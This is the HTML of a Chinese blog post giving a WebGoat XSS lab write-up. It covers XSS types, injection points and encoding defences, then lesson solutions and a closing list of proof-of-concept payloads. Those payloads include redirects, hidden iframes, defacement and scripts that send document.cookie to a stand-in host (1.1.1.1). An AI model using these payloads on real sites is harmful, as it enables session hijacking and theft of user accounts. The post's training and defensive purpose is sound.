<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="基础知识XSS全称Cross-site script（跨站脚本攻击），是在允许使用html和script标签作为输入时未进行编码和过滤显示在页面时导致的漏洞  分类   1.反射性    攻击者将包含恶意代码的连接发送给受害者（利用社工技术），受害者在点击链接后将恶意代码提交给服务器，服务器将将恶意脚本显示在页面上导致恶意代码在浏览器执行，使得攻击者窃取受害者数据或控制浏览器      2.存储性">
<meta property="og:type" content="article">
<meta property="og:title" content="Webgoat - xss">
<meta property="og:url" content="http://yoursite.com/2020/08/21/Webgoat%20-%20xss/index.html">
<meta property="og:site_name" content="Tansz">
<meta property="og:description" content="基础知识XSS全称Cross-site script（跨站脚本攻击），是在允许使用html和script标签作为输入时未进行编码和过滤显示在页面时导致的漏洞  分类   1.反射性    攻击者将包含恶意代码的连接发送给受害者（利用社工技术），受害者在点击链接后将恶意代码提交给服务器，服务器将将恶意脚本显示在页面上导致恶意代码在浏览器执行，使得攻击者窃取受害者数据或控制浏览器      2.存储性">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200716203400304.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlZV9tZWU=,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200716203403274.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlZV9tZWU=,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200716203512308.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200716204830736.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlZV9tZWU=,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200716212913426.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlZV9tZWU=,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200716213014669.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlZV9tZWU=,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200716213038169.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020071621315039.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlZV9tZWU=,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200716213230567.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200716213315525.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200716213347705.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200716213616898.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200716214424724.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlZV9tZWU=,size_16,color_FFFFFF,t_70">
<meta property="article:published_time" content="2020-08-21T03:01:32.616Z">
<meta property="article:modified_time" content="2020-08-21T03:01:34.536Z">
<meta property="article:author" content="Tansz">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/20200716203400304.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlZV9tZWU=,size_16,color_FFFFFF,t_70">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>Webgoat - xss</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/projects_url">项目</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2020/08/21/Webgoat-CSRF_SSRF/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2020/08/21/Webgoat--%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6%E7%BC%BA%E9%99%B7/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2020/08/21/Webgoat%20-%20xss/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2020/08/21/Webgoat%20-%20xss/&text=Webgoat - xss" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2020/08/21/Webgoat%20-%20xss/&title=Webgoat - xss" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2020/08/21/Webgoat%20-%20xss/&is_video=false&description=Webgoat - xss" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Webgoat - xss&body=Check out this article: http://yoursite.com/2020/08/21/Webgoat%20-%20xss/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2020/08/21/Webgoat%20-%20xss/&title=Webgoat - xss" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2020/08/21/Webgoat%20-%20xss/&title=Webgoat - xss" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2020/08/21/Webgoat%20-%20xss/&title=Webgoat - xss" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2020/08/21/Webgoat%20-%20xss/&title=Webgoat - xss" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2020/08/21/Webgoat%20-%20xss/&name=Webgoat - xss&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://yoursite.com/2020/08/21/Webgoat%20-%20xss/&t=Webgoat - xss" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#基础知识"><span class="toc-number">1.</span> <span class="toc-text">基础知识</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题解"><span class="toc-number">2.</span> <span class="toc-text">题解</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#总结"><span class="toc-number">3.</span> <span class="toc-text">总结</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Webgoat - xss
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Tansz</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-08-21T03:01:32.616Z" itemprop="datePublished">2020-08-21</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h2><p>XSS全称Cross-site script（跨站脚本攻击），是在允许使用html和script标签作为输入时未进行编码和过滤显示在页面时导致的漏洞</p>
<ul>
<li>分类</li>
</ul>
<p> 1.反射性<br>    攻击者将包含恶意代码的连接发送给受害者（利用社工技术），受害者在点击链接后将恶意代码提交给服务器，服务器将将恶意脚本显示在页面上导致恶意代码在浏览器执行，使得攻击者窃取受害者数据或控制浏览器<br>      2.存储性<br>      攻击者将包含恶意代码的数据提交给服务器进行存储，当用户访问显示恶意代码数据的页面时，导致恶意代码在浏览器执行，使得攻击者窃取受害者数据或控制浏览器<br>      3.DOM-based<br>      发生在js写入到html过程中，使用js将用户提交的恶意内容写入html时，导致恶意代码执行，与反射型xss攻击手法类似，<strong>区别在于恶意脚本直接被js执行而不是通过提交到服务端再通过响应结果执行</strong></p>
<ul>
<li><p>常见攻击位置<br> 回显用户数据的搜索框<br> 回显用户数据的输入框<br> 显示用户输入的错误信息<br> 包含用户数据的隐藏标签<br> 显示用户数据的任何页面，例如留言框和自由格式的评论框<br> HTTP header</p>
</li>
<li><p>危害<br>窃取会话的cookie信息<br>创建虚假的请求<br>创建虚假字段用户收集用户的凭据<br>重定向页面到其他页面<br>创建伪造用户的请求<br>窃取机密信息<br>在用户系统上执行恶意脚本<br>在网页插入恶意代码<br>网络钓鱼（在url中插入合法的域名）</p>
</li>
<li><p>防御<br>对(服务器端和客户端js)输出到html/script标签中的<strong>数据进行编码(不要使用黑名单过滤)</strong><br>server-&gt;html：使用html encoder编码为html实体<br>server-&gt;js：使用js encoder进行编码<br>js-&gt;html：使用html encoder编码为html实体</p>
<h2 id="题解"><a href="#题解" class="headerlink" title="题解"></a>题解</h2></li>
<li><p>0x02<br><img src="https://img-blog.csdnimg.cn/20200716203400304.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlZV9tZWU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20200716203403274.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlZV9tZWU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>两次获得一样的cookie<br><img src="https://img-blog.csdnimg.cn/20200716203512308.png" alt="在这里插入图片描述"></p>
</li>
<li><p>0x07<br><strong>字段是否容易受到XSS攻击的简单方法是使用alert（）或console.log（）方法。</strong><br><img src="https://img-blog.csdnimg.cn/20200716204830736.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlZV9tZWU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
</li>
<li><p>0x10<br><img src="https://img-blog.csdnimg.cn/20200716212913426.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlZV9tZWU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>发现路由存在参数传递<br><img src="https://img-blog.csdnimg.cn/20200716213014669.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlZV9tZWU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>test路由调用了lessonController控制器模块下的testHandler()函数<br><img src="https://img-blog.csdnimg.cn/20200716213038169.png" alt="在这里插入图片描述"><br>定位到lessonController控制器<br><img src="https://img-blog.csdnimg.cn/2020071621315039.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlZV9tZWU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
</li>
</ul>
<p>testHandler()调用lessonContentView.showTestParam(param)函数<img src="https://img-blog.csdnimg.cn/20200716213230567.png" alt="在这里插入图片描述"><br>再次定位<br><img src="https://img-blog.csdnimg.cn/20200716213315525.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20200716213347705.png" alt="在这里插入图片描述"><br>发现该函数直接将test路由传递过来的参数直接显示到页面上，存在XSS<br><img src="https://img-blog.csdnimg.cn/20200716213616898.png" alt="在这里插入图片描述"></p>
<ul>
<li><p>0x11<br>利用方式  &lt; img src=”” onerror=’alert(webgoat.customjs.phoneHome())’&gt;<br><img src="https://img-blog.csdnimg.cn/20200716214424724.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlZV9tZWU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2></li>
<li><p>使用场景<br>直接嵌入HTML     &lt; script&gt;alert(‘XSS’)&lt;/ script&gt;<br>元素便签事件     &lt; body onload=alert(‘XSS’)&gt; ,&lt; img src=”” onerror=’alert(“xss”)’&gt;<br>图片标签             &lt; img src=”javascript:alert(‘XSS’);”&gt;<br>其他标签            &lt; iframe&gt;, &lt; div&gt;,&lt; link&gt;</p>
</li>
<li><p>利用POC</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//检测是否存在XSS漏洞</span></span><br><span class="line">&lt;script&gt;alert(<span class="string">'xss'</span> )&lt;<span class="regexp">/script&gt;</span></span><br><span class="line"><span class="regexp">&lt;a href=" onclick=alert('xss')&gt;type&lt;/</span>a&gt;</span><br><span class="line">&lt;img src=http:<span class="comment">//1.1.1.1/a.jpg onerror=alert('xss')&gt;</span></span><br><span class="line"><span class="comment">//利用xss实现页面重定向</span></span><br><span class="line">&lt;script&gt;<span class="built_in">window</span>.location=<span class="string">'http://1.1.1.1'</span>&lt;<span class="regexp">/script&gt;</span></span><br><span class="line"><span class="regexp">&lt;iframe SRC="http:/</span><span class="regexp">/1.1.1.1 /</span>victim<span class="string">" height = "</span><span class="number">0</span><span class="string">" width ="</span><span class="number">0</span><span class="string">"&gt; &lt;/iframe&gt;</span></span><br><span class="line"><span class="string">//获取受害者cookie</span></span><br><span class="line"><span class="string">&lt;script&gt;new lmage(). src-="</span>http:<span class="comment">//1.1.1.1/c.php?output="+document.cookie;&lt;/script&gt;</span></span><br><span class="line"><span class="comment">//实现页面内容篡改</span></span><br><span class="line">&lt;script&gt;<span class="built_in">document</span>.body.innerHTML=<span class="string">"&lt;div style=visibility:visible;&gt;&lt;h1&gt;THIS WEBSITE IS UNDER ATTACK&lt;/h1&gt;&lt;/div&gt;"</span>;&lt;<span class="regexp">/script&gt;</span></span><br></pre></td></tr></table></figure>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//窃取cookie，在肉鸡上存放js脚本，让受害者访问肉鸡上的脚本</span></span><br><span class="line">&lt;script src=http:<span class="comment">//1.1.1.1/a.js&gt;&lt;/script&gt;</span></span><br><span class="line"><span class="comment">//a.js 源码</span></span><br><span class="line">&lt;script&gt;</span><br><span class="line"><span class="keyword">var</span> img = <span class="keyword">new</span> Image();</span><br><span class="line">img.src = <span class="string">"http://1.1.1.1 /cookies.php?cookie="</span>+<span class="built_in">document</span>.cookie;</span><br><span class="line">&lt;<span class="regexp">/script&gt;</span></span><br></pre></td></tr></table></figure>

</li>
</ul>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/projects_url">项目</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#基础知识"><span class="toc-number">1.</span> <span class="toc-text">基础知识</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题解"><span class="toc-number">2.</span> <span class="toc-text">题解</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#总结"><span class="toc-number">3.</span> <span class="toc-text">总结</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2020/08/21/Webgoat%20-%20xss/" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2020/08/21/Webgoat%20-%20xss/&text=Webgoat - xss" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2020/08/21/Webgoat%20-%20xss/&title=Webgoat - xss" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2020/08/21/Webgoat%20-%20xss/&is_video=false&description=Webgoat - xss" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Webgoat - xss&body=Check out this article: http://yoursite.com/2020/08/21/Webgoat%20-%20xss/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2020/08/21/Webgoat%20-%20xss/&title=Webgoat - xss" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2020/08/21/Webgoat%20-%20xss/&title=Webgoat - xss" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2020/08/21/Webgoat%20-%20xss/&title=Webgoat - xss" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2020/08/21/Webgoat%20-%20xss/&title=Webgoat - xss" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2020/08/21/Webgoat%20-%20xss/&name=Webgoat - xss&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://yoursite.com/2020/08/21/Webgoat%20-%20xss/&t=Webgoat - xss" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    1970-2020
    Tansz
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/projects_url">项目</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
